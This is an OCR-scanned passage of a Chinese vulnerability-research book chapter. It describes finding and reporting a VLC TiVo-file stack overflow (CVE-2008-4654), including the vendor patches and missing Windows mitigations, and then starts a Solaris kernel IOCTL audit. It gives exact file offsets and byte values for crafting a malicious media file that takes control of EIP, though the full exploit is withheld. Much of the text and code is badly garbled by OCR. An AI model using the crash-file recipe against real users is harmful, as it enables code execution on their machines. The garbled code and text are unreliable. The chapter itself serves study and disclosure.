1851 stream Read( p demux-»s, NULL, p sys-»i stuff cnt); 
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1852 p sys-»i stuff cnt = 0; 
} 


1853 

1854 

1855 /* read the TY packet header */ 

1856 i readSize - stream Peek( p demux-»s, &p peek, 4 ); 
1857 p sys-»i cur chunk; 

1858 

1859 if ( (i readSize < 4) || ( U32 AT(&p peek[ o ] ) == 0 )) 
1860 { 

1861 pt EOF *y 

1862 p sys-»eof = 1; 

1863 return 0; 

1864 j 

1865 


1866 /* check if it's a PART Header */ 
1867 if( U32 AT( 8p peek[ 0 ] ) == TIVO PES FILEID ) 
{ 


1868 

1869 /* parse master chunk */ 

1870 parse master(p demux); 

1871 return get chunk header(p demux); 
1872 





"B 185647, 在 函数 get chunk header()'P, TiVo 文件 中 的 用 户 控制 数据 赋 给 
了 指针 p_peek。 之 后 ， 第 1867 行 ， 程 序 检查 p peek 指 问 的 文件 数据 是 否 等 于 
TIVO PES FILEID( 在 第 112 行 被 定义 为 0xf5467abd ), 相等 就 调用 存在 漏洞 的 函数 
— (第 187077 ). 

要 想 通 过 这 条 代码 执行 路 径 到 达 存 在 漏洞 的 函数 , 这 个 Ti Vo 样 例文 件 需要 包 
^; TIVO PES FILEID 的 值 。 我 在 整个 文件 中 搜索 这 个 值 的 模式 ， 在 文件 的 
0x00300000 侦 移 处 找到 了 【(〈 见 图 2-3 )。 











图 2-3 TiVo 样 例 文件 中 的 TIVO PES FILEID 值 模式 


从 parse_master() 子 数 可 以 知道 ( 见 下 面 的 源 代码 片段 )， i map size 的 值 应 
在 文件 中 TIVO PES FILEID 值 模式 位 置 ( 文件 偏 移 0x00300000 处 ) 青 偏 移 20( 0x14 ) 
的 地 方 。 


[..] 

1641 stream Read(p demux->s, mst buf, 32); 

1642 i map size = U32 AT(&mst buf[20]); /* size of bitmask, in bytes */ 
[..] 


这 时 ， 我 发 现下 载 的 这 个 TiVo 样 例文 件 已 经 能 够 触发 存在 源 洞 的 函数 
parse_master() 了 ， 因 此 不 必 进 行 任何 调整 。 太 棒 了 1! 
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2.2.3 Smp: 修改 这 个 TiVo 电 影 文 件 ， 使 VLC 朋 演 
接 下 来 ， 我 尝试 修改 这 个 TiVo 样 例文 件 以 M http://download.videolan. 


使 VLC 朋 溃 。 为 此 ， 我 只 需要 修改 这 个 样 例文 ore/pub/videolan/vlc/0.9.4/win32/ 
件 中 i map size 所 在 偏 移 位 置 的 4B 值 (在 这 里 。 得 到 VLC ab windows Ws + faf 
是 偏 移 0x00300014 处 )。 程序 ， 

如 图 2-4 所 示 ， 我 把 文件 偏 移 0x00300014 处 的 32 位 值 从 0x00000002 改 成 
ox000000ff。 新 的 值 255 Coxff) FT EIIE 32B 大 小 的 栈 缓冲 区 游 出， 并 且 履 
盖 栈 空间 中 保存 在 这 块 缓冲 区 之 后 的 返回 地 址 ( 见 A.1 市 )。 然 后， 用 Immunity 
Debugger" | 调试 时 我 用 VLC 打开 这 个 改动 过 的 样 例文 件 , 电 影 文件 像 之 前 一 样 开 
始 播 放 ， 一 旦 执行 到 改动 过 的 数据 ， 儿 秒 钟 之 后 VLC tei wii 0, RRA 
图 2-5 所 示 。 








Fite View Deine Plugins ImmLib Options Window Help Jobs 


 lemtwhcPktbzr. js 7 Ear 
» Registers FPU 
| BM TTT TT TT 
G 





:ST umna4n56 
IDI 496C1 P83 
?^ 266380008 


ES 8623 32bit 
CS AOIB 32bit 
SS 0023 32bit 
S 6823 32bhit 


Z p 

S Ø FS @83B 32h 
GS 8688 NULL 

I 


,astErr ERROR SUCCESS “090000009 > 





| [13:18:18] Access violalinti when executing [20080100] ~ Use Bhilt4F Z/FB/FS to pass exception to Piogiam 


图 2-5 Immunity Debugger 中 的 VLC 非法 访问 
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不 出 所 料 , VLC 在 解析 这 个 格式 错误 的 TiVo 文件 时 月 演 了 。 这 个 月 演 很 有 价 

值 ， 因 为 指令 指针 寄存 舌 (EIP register ) i ill SIN 

态 栏 提 示 信 息 Access violation when executing [20030000] 可 以 说 明 )。 这 意味 着 我 
可 以 轻易 控制 指令 指针 。 


2.2.4 ”第 四 步 : 修改 这 个 TiVo 电 影 文件 ， 控 制 EIP 


下 一 步 我 需要 确定 样 例文 件 的 哪些 字 节 禾 写 了 当前 栈 帧 〈stack frame ) 中 的 返 
回 地 址 , 这 样 我 就 能 控制 EIP 了 。 调试 右 显 示 , FETAR WHY EIP 的 值 为 0x20030000。 
为 确定 这 个 值 所 在 位 置 的 偏 移 ， 我 可 以 尝试 计算 准确 的 文件 偏 移 ， 也 可 以 直接 在 
整个 文件 中 搜索 这 个 值 的 字 贡 模式 。 我 选择 后 面 这 个 方法 , MC EARS 0x00300000 
处 开始 搜索 。 结 果 在 文件 偏 移 0x0030005c 处 找到 了 想 要 的 字 节 序列 ， 用 的 是 小 端 
表示 法 (little-endian )， 我 把 这 4 个 字 市 的 值 改 成 0x41414141( 如 图 2-6 所 示 )。 





00300050h: 56 4A 00 00 03 1F 6C 49 6A AO 25 45|00 00 03 20|; VJ....1Ij 96 E... 





00300050h: 56 4A 00 00 03 1F 6C 49 6A AO 25 45|41 41 41 41]; VJ....11j % EAAAA 


图 2-6 TiVo 样 例 文件 中 EIP 的 新 值 
然后 在 调试 需 中 重新 运行 VLC， 打 开 这 个 新 文件 (如 图 2-7 所 示 )。 








ml FAX 86606006 
g BS eA RANA 


EDI 496C1F03 
EIP 41414141 








[113:23:26) Aecess-vielalion when executing [41414141] -use ShificF?/FB/F3 tà pass exception ta program 


图 2-7 VLC HARRESA EIP 控制 
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EIP = 41414141……EIP 控制 的 任务 完成 ! 我 可 以 构建 一 个 有 效 的 漏洞 利用 程 
FF. 使 用 著名 的 jmp reg 技术 来 实现 任意 代码 执行 (arbitrary code execution ) 攻击 。 
David Litchfield TE "Linux 和 Windows 下 漏洞 利用 技术 的 差异 (Variations in Exploit 
Methods Between Linux and Windows “一 文中 提 到 了 这 种 技术 。 

我 不 会 给 你 这 个 完整 的 、 可 工作 的 漏洞 利用 程序 , S BUT BEES E 
这 样 做 ， 有 兴趣 的 话 ， 你 可 以 看 看 我 录制 的 一 个 演示 实际 漏洞 利用 程序 的 视频 
HB, M 























2.3 漏洞 修正 


2008 年 /0 月 /83 日， 星期 六 


既然 我 发 现 了 这 个 安全 漏洞 ， 可 以 用 几 个 方式 公开 它 。 可 以 联系 软件 的 开发 
者 ,“ 负 责任 ”地 告诉 他 我 的 发 现 , 并 帮助 他 打 好 补丁 。 这 个 过 程 称 为 负责 任 的 漏 
洞 披露 (responsible disclosure )。 因 为 这 个 词 暗 示 其 他 公开 方式 是 不 负责 任 的 (而 
实际 并 非 如 此 )， 所 以 逐渐 地 被 蔡 换 成 协作 的 漏洞 披露 ( coordinated disclosure ). 

男 一 方面 ， 我 也 可 以 把 自己 的 发 现 出 售 给 漏洞 经 纪 人 (vulnerability broker ), 
由 他 来 告诉 软件 的 开发 者 。 现 今 ， 商 业 漏 洞 市 场 上 两 个 主要 的 机 构 是 Verisign 的 
iDefense Labs 提供 的 “VCP 计划 ”( Vulnerability Contribution Program" ) 和 Tipping 
Point 公司 的 “ZDI 计划 ”( Zero Day Initiative? ), VCP 和 ZDI 都 遵循 协作 的 漏洞 披 
露 实 践 ， 与 受到 影响 的 开发 商 合 作 。 

另 一 个 选择 是 完全 披露 (full disclosure )。 如 条 选择 完全 披露 ， 我 将 会 回 公 众 
发 布 漏洞 信息 而 不 是 报告 给 开发 商 。 还 有 其 他 可 选 的 公布 方式 ， 但 它们 硼 后 的 动 
机 通常 不 包括 修复 这 个 bug( 例如 在 黑市 出 售 h | 

PALIT ZA VLC 汤 洞 来 说 ， 我 选择 协作 披露 。 也 就 是 说 ,我 通知 了 VLC 
的 维护 者 ， 提 供给 他 们 必要 的 信息 ， 与 他 们 协作 选择 公开 披露 的 时 机 。 

将 bug 通知 了 VLC 的 维护 者 之 后 ， 他 们 开发 了 如 下 补丁 来 处 理 这 个 漏洞 。”" 

















CD 相关 信息 可 从 Verisign 官方 网 站 上 查询 ，vulnerability intelligence 页 面 的 短 址 为 http:/vrsn.cc/xyFawL。 
= 

(2 ZDI 计 划 或 称 零 日 计划 , Zero Day 官方 网 站 为 http:/www.zerodayinitiative.com/, 短 址 为 http:/bitlyzLbzEl。 
一 省 
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--- a/modules/demux/ty.c 
+++ b/modules/demux/ty.c 
@@ -1639,12 «1639,14 @@ static void parse master(demux t *p demux) 
/* parse all the entries */ 
p sys-»seq table - malloc(p sys-»i seq table size * sizeof(ty seq table t)); 
for (i=0; i«p sys-»i seq table size; i++) { 
stream Read(p demux-»s, mst buf, 8 + i map size); 
+ stream_Read(p_demux->s, mst_buf, 8); 
p sys-»seq table[i].1 timestamp = U64 AT(&mst buf[O0]); 
if (i map size > 8) 1 
msg Err(p demux, "Unsupported SEO bitmap size in master chunk"); 


+ stream Read(p demux-»s, NULL, i map size); 
memset(p sys-»seq table[i].chunk bitmask, i map size, O); 
} else { 
十 stream Read(p demux-»s, mst buf + 8, i map size); 


memcpy(p sys-»seq table[i].chunk bitmask, &mst buf[8], i map size); 
} 


所 做 的 改动 简单 易 懂 ,之 前 调用 函数 stream_Read() 的 漏洞 现在 改 成 了 使 用 
定 大 小 值 ,并 且 仅 当 用 户 控制 的 1_map_size 值 小 于 等 于 8 时 , 才 作 为 stream_Read() 
使 用 的 大 小 值 。 cA 显 bug 的 简单 修正 方法 。 

但 是 请 等 一 等 ， 这 个 漏洞 真 的 解除 了 吗 ? Age imap size 的 类 型 仍然 是 有 符 
号 整 型 ， 如果 一 个 大 于 等 于 0x80000000 的 值 赋 给 i map_size， 它 会 被 解释 成 一 个 
负数， 于 是 仍然 会 在 stream Read()PAZIUX H.£^ ] else 分 文中 的 memcpy () RA E 
发 生 洲 出 (无 人 符号 整 型 和 符号 整 — Jo 我 把 这 个 问题 也 报告 给 
了 VLC 的 维护 者 ， 结 果 他 们 又 打 了 一 个 补丁 。 











[..] 
@@ -1616,7 +1618,7 @@ static void parse master(demux t *p demux) 
{ 


demux sys t *p sys = p demux-»p sys; 
uint8 t mst buf[32]; 
int i, i map size; 
+ uint32 t i, i map size; 
int64 t i save pos - stream Tell(p demux-»s); 
into4 t i pts secs; 





现在 变量 i map size 是 无 符 扎 整 型 了 ， 这 个 bug 被 修复 了 。 也 许 你 早 就 注意 
FKZ parse_master() 里 有 为 一 个 缕 冲 区 淤 出 漏洞 了 。 我 也 把 这 个 bug 报告 给 了 
VLC 的 维护 者 。 如 采 找 不 出 它 ， 仔 细 看 看 VLC 维护 者 提供 的 第 二 个 补丁 ， 正 好 
把 这 个 bug 也 修复 了 。 

让 我 导 讶 的 是 , Windows Vista 没有 一 种 值得 称道 的 漏洞 利用 绥 解 技术 ( exploit 
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mitigation technique )， 无 法 阻止 我 控制 EIP 以 及 使 用 jmp reg 技术 执行 栈 空间 中 的 
任意 代码 。 安 全 cookie (security cookie ) 或 /GS 特性 应 该 能 防止 返回 地 址 被 算 改 。 
此 外 ，ASLR 或 NX/DEP 应 该 可 以 防止 任意 代码 执行 (所 有 这 些 缓解 技术 的 详细 
描述 见 C.1 节 )。 

为 了 解决 这 个 疑惑 , 我 下 载 了 Process Explorer", 配置 后 可 以 显示 进程 的 DEP 
和 ASLR 状态 。 


注意 为 了 配置 Process Explorer 以 显示 进程 的 DEP 和 ASLR 状态 ,我 在 视图 区 
( View ) 增 加 了 以 下 列 : View > Select Columns > DEP Status 和 View > Select 
Columns > ASLR Enabled。 此 外 ， 我 设置 了 底部 窗口 来 查看 进程 使 用 的 
DLL， 并 且 增 加 了 ASLR Enabled 列 。 


Process Explorer 的 输出 如 图 2-8 所 示 ， 显 示 了 VLC 及 其 模块 没有 使 用 DEP 
和 ASLR (因为 DEP 和 ASLR 列 有 空 值 )。 我 继续 深入 研究， 想 确 定 为 什么 VLC 
进程 没有 使 用 这 些 绥 解 技术 。 


File Options View Process Find DIE Users Help 


| 3| 5 fH 3| p | dA €» 


VLC media pleyer the VideoLAN Team 





CPU Usage: 3.06% Commit Charge 13.75% Processes: 46 Physical Usage: 31.89% 





图 2-8 Process Explorer 中 的 VLC 


DEP 可 被 系统 荣 略 ( system policy ) 通过 特殊 的 API 和 编译 时 选项 控制 ( 关 
于 DEP 的 更 多 信息 见 微软 的 安全 研究 及 防护 博客 U5), ff Windows Vista 这 样 的 
客户 端 操 作 系 统 中 默认 的 系统 级 (system-wide ) DEP 宁 略 称 为 OptIn。 在 这 种 操 
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作 系 统 模式 中 ，DEP 仅 对 明确 加 入 DEP 的 进程 起 作用 。 因 为 我 用 的 是 32 位 
Windows Vista 操作 系统 的 默认 安装 ， 系统 级 DEP 策略 应 该 是 设置 成 OptIn 的 。 为 
了 验证 这 一 点 ， 我 在 管理 员 权 限 的 命令 行 (elevated command prompt ) 中 使 用 
bcdedit.exe 命令 行 应 用 程序 。 


C:\Windows\system32>bcdedit /enum | findstr nx 
nx OptIn 


该 命令 的 输出 显示 了 系统 确实 使 用 了 DEP 的 OptIn 操作 模式 配置 ， 这 就 解释 
了 为 什么 VLC 没有 使 用 缓解 技术 : 只 是 因为 进程 没有 加 入 到 DEP 中 。 

把 一 个 进程 加 入 DEP 中 的 方式 有 几 种 。 举 例 来 说 ,可 以 在 编译 时 使 用 适当 的 
链接 开关 ( /NXCOMPAT ), 或 者 可 以 使 用 API SetProcessDEPPolicy， 以 编程 方式 
将 应 用 程序 加 入 到 DEP 中 。 

为 了 全面 概括 VLC 使 用 的 安全 相关 编译 时 选项 , 我 用 LookingGlass 扫描 了 媒 
体 播放 器 的 可 执行 文件 ( 见 图 2-9 )。 BM 











E Looking Glass eic FS 4 FR a Visual C++ 2005 SPI 
ez i BR abe cel ty A EB 


Hle System 


e Stem ho: 
Scan Directoy: 00000 Stats TT 
CAProgram Files\VideoLAN\WWLC Number of files witheut ASLR O dS 全 cookie/canary 

Number of files without NX: 探测 由 /GS d 项 
vineis e eid : 

Sie p ees pan O 支持 ASLR 的 /DYNAMIC- 

BASE gk r 
O 支持 DEP/NX d3/NXC- 

File Path Nx + 2 
libtrivial resampler plugin.dl C:\Program Alles ‘\wWideoLAN VLC... False OMPAT xi 工人 
lbts_plugnmn. 吉 C:\Program Files *wideoLAN*VLC... False ny 7 - 
libtta plugini.dll C:\Program Files wideoL ANVLC*... False d x 8 F m is 理 t iP a) 
libtwolame_plugin dll C:\Program Files *wideo AN*VLC... False / SAFESEH at rm 


C:\Program iles WideoLAN\WLC\.. 
libugh resampler_plugin.dll C:\Program Files\wideoLAN\VLC.... False False 
libvc 1. plugin .dll C:\Program FileswideoLAN*VLC.. False False 
libved_plugin dll (\Program Files‘wideoLAN\VLOC’... False False [3 
libisural  plugin.dll C:\Program FilesswideoLANSVLC.. False False 
libymem_plugin dll C:\Program Files‘\wideoLAN\VLO\... False False = 


4 | n | H 





图 2-9 LookingGlass 扫描 VLC 的 结 
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注意 2009 年， 微软 发 布 了 一 款 名 叫 BinScope 的 二 进 制 文件 分 析 工 具 ， 界 面 简 
单 易 用 ， 可 以 分 析 二 进 制 文件 中 各 种 各 样 的 安全 保护 。 吕 


LookingGlass 显 示 编 译 VLC 时 既 没 有 使 用 ASLR ,也 没有 使 用 DEP 链 接 开 关 U^, 
VLC 媒体 播放 器 的 Windows 发 布 版 本 是 在 Cygwin “环境 下 编译 的 ， 这 是 一 套 在 
Windows 操作 系统 下 运行 Linux 模拟 环境 的 工具 集 。 因 为 我 之 前 提 到 的 链接 开关 仪 
在 微软 的 Visual C++ 2005 SP1 及 之 后 版 本 下 文 持 ( 因此 Cygwin 不 文 择 )， 所 以 
VLC 不 文 持 并 不 奇怪 。 

请 看 VLC 构建 命令 的 部 分 摘录 。 


Building VLC from the source code 


- natively on Windows, using cygwin (www.cygwin.com) with or without the POSIX 
emulation layer. This is the preferred way to compile vlc if you want to do it on 
Windows. 


- natively on Windows, using Microsoft Visual Studio. This will not work. 


写 这 些 内 容 时 ，VLC 并 没有 使 用 Windows Vista 及 其 之 后 发 布 版 提供 的 任何 
漏洞 利用 缓解 技术 。 因 此 ， 现 在 Windows F VLC 的 每 一 个 bug 都 是 容易 利用 的 ， 
就 像 20 年 前 这 些 安 全 特性 没有 被 广泛 部 署 和 文 持 时 一 样 。 











2.4 经 验 和 教训 


作为 一 名 程序 员 ， 要 做 到 以 下 几 点 。 

a 永远 不 要 相信 用 户 的 输入 (包括 文件 数据 、 网 络 数据 等 )。 

a 永远 不 要 使 用 未 经 验证 的 数值 长 度 或 大 小 。 

口 只 要 可 能 ， 务必 使 用 现代 操作 系统 提供 的 漏洞 利用 缓解 技术 。 在 Windows 
中 ， 软 件 要 用 微软 的 Visual C++ 2005 SP1 或 更 新 的 版 本 编译 ， 并 且 使 用 合 
WAN AWE. HERI, Fb, METE I Enhanced Mitigation Experience 
Toolkit ， 人 允许 一 些 特定 的 缓解 技术 无 需 重 新 编译 便 可 直接 应 用 。 

作为 一 名 媒体 播放 融 的 使 用 者 ， 要 做 到 

O 永远 不 要 相信 媒体 文件 的 扩展 名 ( 见 2.5 市 )。 
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这 个 漏洞 修复 后 ，VLC 发 布 了 新 的 版 本 ， 所 以 我 在 自己 的 网 站 上 发 布 了 一 个 
详细 的 安全 报告 (图 2-10 显示 了 时 间 表 中 )。 这 个 bug 的 编号 是 CVE-2008-4654。 


注意 根据 MITRE 提供 的 文档 ， 公 共 的 漏洞 披露 标识 符 (C Common 
Vulnerabilities and Exposures Identifiers ) ( 也 称 作 CVE 名 字 、CVE 编号 、 
CVE-ID A CVE) 是 “为 公众 所 知 安全 漏洞 信息 的 唯一 、 公 共 的 标识 符 o 


VLC 维 护 者 修补 漏 润 





VLC 维 护 者 注音 EU: dal 打 补 丁 后 的 VLC 版 公布 我 发 布 了 裤 全 报告 


bd 


10 .18.2008 10 .20.2008 


图 2-10 ”该 漏洞 的 时 间 表 








2000 年 1 月 5s 日， 里 期 一 


发 现 这 个 bug 以 及 公开 详细 报告 的 副作用 是 , 我 收 到 很 多 来 自 VLC 用 户 的 邮 
件 ， 其 中 提出 了 各 种 各 样 的 问题 。 下 面 这 两 个 问题 我 看 了 一 裔 义 一 裔 : 
我 之 前 从 来 没 听 说 过 TiVo 的 媒体 文件 格式 ， 为 什么 ? 
如 果 我 不 再 用 VLC 打开 TiVo 媒体 文件 ， 是 否 就 安全 了 ? 


这 些 问 题 都 是 合理 的 ， 所 以 我 问 自己 ， 对 于 那些 从 互联 网 上 下 和 载 的 除了 文件 
扩展 名 没有 其 他 信息 的 媒体 文件 ， 我 通常 会 怎样 了 解 它 的 格式 信息 呢 ?” 我 会 用 十 
六 进 制 编辑 右 看 一 看 这 个 文件 的 文件 涉 ， 但 老实 说 ， 我 不 认为 云云 众生 都 会 费 这 
个 劲 。 可 是 文件 扩展 名 可 信 吗 ? 不 ， 它 们 不 可 信 。Tivo 文件 规范 的 扩展 名 是 .ty， 
但 怎么 可 能 阻止 攻击 者 把 文件 名 从 fun.ty PU, fun.avi, fun.mov, fun.mkv 或 其 他 
任何 她 想 要 的 呢 ? 文件 仍然 会 被 VLC 媒 体 播 放 需 当做 一 个 Tivo 文 件 打开 并 处 理 ， 
为 VLC 像 几 乎 其 他 所 有 的 媒体 播放 怖 一 样 , 不 是 靠 文件 扩展 名 来 识别 媒体 文件 
格式 的 。 
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附注 


[1] 


[2] 


[9] 


参考 Dick Grune 和 Ceriel J.H. Jacobs 的 Parsing Techniques: A Practical Guide, 2" ed. (New 
York: Springer Science+Business Media, 2008), 1. 

VLC 此 漏洞 版 本 的 源 代码 可 从 以 下 网 址 下 载 : http://download.videolan.org/pub/videolan/vlc/ 
0.9.4/vlc-0.9.4.tar.bz2 ( 短 址 http://bit.ly/wY cz2m )。 

Immunity Debugger 是 一 球 不 错 的 基于 OllyDbg 的 Windows 调试 需 。 它 有 一 个 友好 的 图 形 
用 户 界 面 (GUI ) 以 及 许多 额外 的 功能 和 插件 文 持 捉 虫 和 漏洞 利用 程序 的 开发 。 可 从 以 下 
网 址 获得 : http://www.immunityinc.com/products-immdbg.shtml ( 短 址 http://bit.ly/yMzrDR )。 
参考 David Litchfield IJ “Variations in Exploit Methods Between Linux and Windows" , 2003, 











http://www.necgroup.com/Libraries/Document Downloads/Variations in. Exploit methods bet- 
ween Linux and Windows.sflb.ashx ( 短 址 http://bit.ly/wVt2Qq )。 

Il, http://www.trapkit.de/books/bhd/ ( 短 址 http://bit.ly/yZX6td ). 

关于 漏洞 的 商业 市 场 以 及 负责 的 、 协 作 的 和 完全 的 披露 ， 可 参考 Stefan Frei, Dominik 
Schatzmann, Bernhard Plattner 和 Brian Trammel fJ. “Modelling the Security Ecosystem— The 





Dynamics of (In)Security" , 2009, http://www.techzoom.net/publications/security-ecosystem/ ( 短 
Jikhttp://bit.ly/wsP3rv )。 

VLC 的 Git 仓 库 可 从 以 下 网 址 获得 : http://git.videolan.org/。 这 个 bug 的 第 一 个 修复 版 本 可 
以 从 以 下 网 址 下 载 : http://git.videolan.org/?p-vlc.git;:a-commitdiff;:h-26d92b87bba99b5ea2e17b 
7eaa39c462d65e9133 ( 短 址 http://bit.ly/wLiq1o )。 

之 后 我 发 现 的 那个 VLC bug 的 修复 版 本 可 以 从 以 下 网 址 下 载 : http://git.videolan.org/?p-vlc. 
git;a-commitdiff;h-d859e6b9537af2d7326276f70de25a840f554dc3 ( 短 址 http://bit.ly/yNloxZ )。 
2 aX Process Explorer， 可 以 访问 http://technet.microsoft.com/en-en/sysinternals/bb896653/ 
( 短 址 http://bit.ly/wDIGyS8 ). 


[10] I, http://blogs.technet.com/b/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology 


part-1.aspx ( 短 址 http://bit.ly/xgUf5e )。 





[11] LookingGlass 是 一 于 方便 的 工具 ， 可 以 扫描 目录 结构 或 正在 运行 的 进程 ， 报 告 哪些 二 进 制 





文件 没有 使 用 ASLR 和 NX。 它 可 以 从 以 下 网 址 获得 :http://www.erratasec.com/lookingglass .html 
( 短 址 http://bit.ly/AaiLkx ). 





[12] 2 F4k BinScope 二 进 制 分 析 工 具 ， 可 以 访问 http://go.microsoft.cony?1linkid-9678113 ( 短 址 


http://bit.ly/A69gM2 )。 


[13] 一 篇 关于 Microsoft Visual C++ 2005 SP1 及 更 新 版 本 的 漏洞 利用 缓解 技术 的 好 文章 :Michael 


Howard HY "Protecting Your Code with Visual C++ Defenses” , MSDN Magazine, March 2008, 
http://msdn.microsoft.com/en-us/magazine/cc337897.aspx ( HE http://bit.ly/xPwnVH )。 


[14] 参见 http://www.cygwin.com/, 
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[15] Enhanced Mitigation Experience Toolkit 可 从 以 下 网 址 获得 : http://blogs.technet.com/srd/ archivbe/ 
2010/09/02/enhanced-mitigation-experience-toolkit-emet-v2-0-0.aspx ( &idiEhttp://bit.ly/ wackSy )。 

[16] 描述 这 个 VLC 漏洞 细节 的 安全 报告 可 从 以 下 网 址 访问 : http://www.trapkit.de/advisories/ 
TKADV2008-010.txt ( 短 址 http://bit.ly/xmD9Wm )。 

[17] Æ Whttp://cve.mitre.org/cve/identifiers/index.html ( 短 址 http://bit.ly/wMSRsu )。 





突破 区 域 限 制 


2007 年 8 月 2? 日 ， 星 期 四 








我 一 直 是 操作 系统 内 核 漏 洞 的 超级 粉丝 ， 2010 年 1 月 22 B, Sun x 
PA ELDER A ER EPG, ABA Oracle 公司 收购 ，Oracle 现在 
容易 利用 。 最 近 我 梳理 了 几 个 操作 系统 内 核 想 。 过 常 旭 Solaris 称 为 “Oracle 
寻找 bug， 其 中 就 有 Sun Solaris 操作 系统 。 猪 ME 
猜 怎 么 样 ? 我 成 功 了 。 





3.1 AWM 

日 从 2005 年 6 月 推出 OpenSolaris, Sun 公司 已 经 把 Solaris 10 操作 系统 的 大 
部 分 都 开源 了 ， 可 以 免费 获取 ， 包 括 内 核 。 于 是 我 下 载 了 源 代 码 tU. JEN 
核 源 代码 ， 主 要 关注 实现 用 户 空间 到 内 核 空间 userto-kernel ) 接口 的 部 分 ， 比 如 
IOCTL 和 系统 调用 。 





注意 输入 、 输 出 控制 (IOCTL ) 用 于 用 户 态 应 用 程序 与 内 核 间 的 通信 。 
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3.1. 发 现 漏洞 


这 是 我 找到 的 最 有 趣 的 着 洞 之 一 ， 因 为 导 任何 把 信 B 4& 3E BH t id (3 
SEP ERE AXE LAR AS E 。 处 理 曲 用 户 / 内 核 接 口 或 API| 都 
可 利用 的 漏洞 中 并 不 常见 (和 通常 的 溢出 bug = 会 提成 潜在 曲 攻 击 向 量 〈 attack 
相 比 )。 它 影响 了 IOCTL 调 用 SIOCGTUNPARAM — "779 > RERA: 


l l LU IOCTL 
的 实现 ， 这 是 由 Solaris 内 核 提 供 的 IP-in-IP O 系统 调用 





隧道 机 制 的 一 部 分 。 站 口 文件 系统 
发 现 这 个 漏洞 的 步骤 如 下 。 O 同 络 栈 
a 第 一 步 : 列 出 内 核 的 IOCTL 。 O R= FR seta wt 


D 第 二 步 : 识别 输入 数据 。 
Q 第 三 步 : 跟踪 输入 数据 。 
FB VESTI A IK ED JR. 


3.1.1 第 一 步 : 列 出 内 核 的 IOCTL 


生成 内 核 IOCTL 列表 的 方法 很 多 ,在 这 里 ,我 只 是 简单 搜索 了 内 核 源 代码 ， 
寻找 常用 的 IOCTL 宏 。 每 个 IOCTL 都 有 自己 的 编号 ， 通常 由 宏 定 义 产 生 。 根 
据 IOCTL 的 类 型 ，Solaris 内 核定 义 了 以 下 宏 : _IOR, _IOW 和 _IOWR。 为 了 列 出 
这 些 IOCTL, 我 切换 到 自己 解压 内 核 源 代码 的 目录 下 ， 用 Unix 的 grep 命令 搜 
索 源 代码 。 








solaris$ pwd 
/ exports/home/tk/on-src/usr/src/uts 


solaris$ grep -rnw -e IOR -e IOW -e _IOWR * 
[ 


common/sys/sockio.h:208:#define SIOCTONLINK  IOWR('i', 145, struct sioc addr req) 
common/sys/sockio.h:210:#define SIOCTMYSITE  IOWR('i', 146, struct sioc addr req) 
common/sys/sockio.h:213:#define SIOCGTUNPARAM — IOR('i', 147, struct iftun req) 
common/sys/sockio.h:216:#define SIOCSTUNPARAM . IOW('i', 148, struct iftun req) 
common/sys/sockio.h:220:#define SIOCFIPSECONFIG IOW('i', 149, 0) /* Flush Policy */ 
common/sys/sockio.h:221:#define SIOCSIPSECONFIG IOW('i', 150, 0) /* Set Policy */ 
common/sys/sockio.h:222:#define SIOCDIPSECONFIG IOW('i', 151, 0) /* Delete Policy */ 
common/sys/sockio.h:223:#define SIOCLIPSECONFIG IOW('i', 152, 0) /* List Policy */ 





现在 ， 我 得 到 了 Solaris 内 核 支持 的 IOCTL 名 字 列 表 。 为 了 找到 处 理 这 些 
IOCTL 的 源 代码 文件 , 我 在 整个 内 核 源 代码 中 搜索 列表 里 的 每 个 IOCTL 名 。 下 面 
是 一 个 搜索 STOCTONLINK IOCTL 的 例子 。 
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solaris$ grep --include=*.c -rn SIOCTONLINK * 
common/inet/ip/ip.c:1267: /* 145 */ ( SIOCTONLINK, sizeof (struct sioc add rreq), > 
IPI GET CMD, 


3.1.2. 第 二 步 : 识别 输入 数据 


Solaris 内 核 为 IOCTL 处 理 提供 了 不 同 的 接口 ,与 我 所 发 现 漏洞 相关 的 接口 是 
一 个 叫做 STREAMS 的 编程 模型 个。 直观 地 说 ，STREAMS 的 基本 单元 叫做 流 
(stream )， 是 一 个 用 户 空间 进程 到 内 核 的 数据 传输 路 径 。 在 STREAMS 模型 中 所 
有 内 核 级 别 的 输入 输出 都 基于 STREAMS 消息 ， 通 常 包括 以 下 元 素 : 一 个 数据 组 
冲 区 ， 一 个 数据 块 ， 以 及 一 个 消息 块 。 数 据 缓冲 区 是 内 存 中 存储 消息 真实 数据 的 
地 方 。 数 据 块 ( datab 结构 ) 描述 这 个 数据 缓冲 区 。 消 息 块 (msgb 结构 ) 描述 这 
个 数据 块 以 及 数据 是 如 何 使 用 的 。 

消息 块 结 构 有 如 下 公共 成 员 。 








源 代码 文件 ”uts/common/sys/stream.h 5] 
[..] 


367 /* 

368 * Message block descriptor 
369 */ 

370 typedef struct msgb { 
371 struct msgb *b next; 
372 struct msgb *b prev; 


373 struct msgb *b cont; 

374 unsigned char *b_rptr; 

375 unsigned char *b_wptr; 

376 struct datab *b datap; 

377 unsigned char b band; 

378 unsigned char b tag; 

379 unsigned short b flag; 

380 queue t *b queue; /* for sync queues */ 
381 ) mblk t; 

[..] 





结构 体 成 员 b rptr 和 b wptr 指定 b_ datap 指针 指向 的 数据 缓冲 区 中 当前 的 读 
写 指针 ILRI 3-1 )。 

使 用 STREAMS 模型 时 ，IOCTL 的 输入 数据 被 msgb 结构 体 (或 者 说 类 型 
mblk t) 的 b_rptr 成 员 引 用 。STREAMS 模型 的 另外 一 个 重要 组 成 部 分 是 所 谓 的 
链接 消息 块 (linked message block )。 如 STREAMS Programming Guide 里 描述 的 ， 
“[ 一 条 ] 复 杂 的 消息 可 以 由 几 个 链接 消息 块 组 成 。 如 果 绥 冲 区 大 小 有 限 ,或 者 程序 
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3.1. 发 现 漏 酒 


扩展 了 消 乱 长度， 请 恩 中 丈 会 形成 多 个 消 晨 块 。” ( 见 图 3-2。) 


b datap 








ty a e ob [x 


| b wptr 
db lim 


图 3-1 一 个 简单 的 STREAMS 消息 块 


b cont 





dblk t 





ty JE E ob x 








| ty JE E t x 








| 数据 缓冲 区 


图 3-2 链接 的 STREAMS 消息 块 


3.1.3 ”第 三 步 : 跟踪 输入 数据 


然后 我 拿 春 这 张 IOCTL 列表 开始 审查 代码 。 和 往常 一 样 ， 我 在 代码 里 搜寻 输 
入 数据 ， 然 后 跟 踩 这 些 数 据 以 寻找 编程 错误 。 几 小 时 后 ， 我 找到 了 这 个 源 洞 。 





源 代 码 文 件 ”uts/common/inet/ip/ip.c 


函数 ip process ioct1()"| 


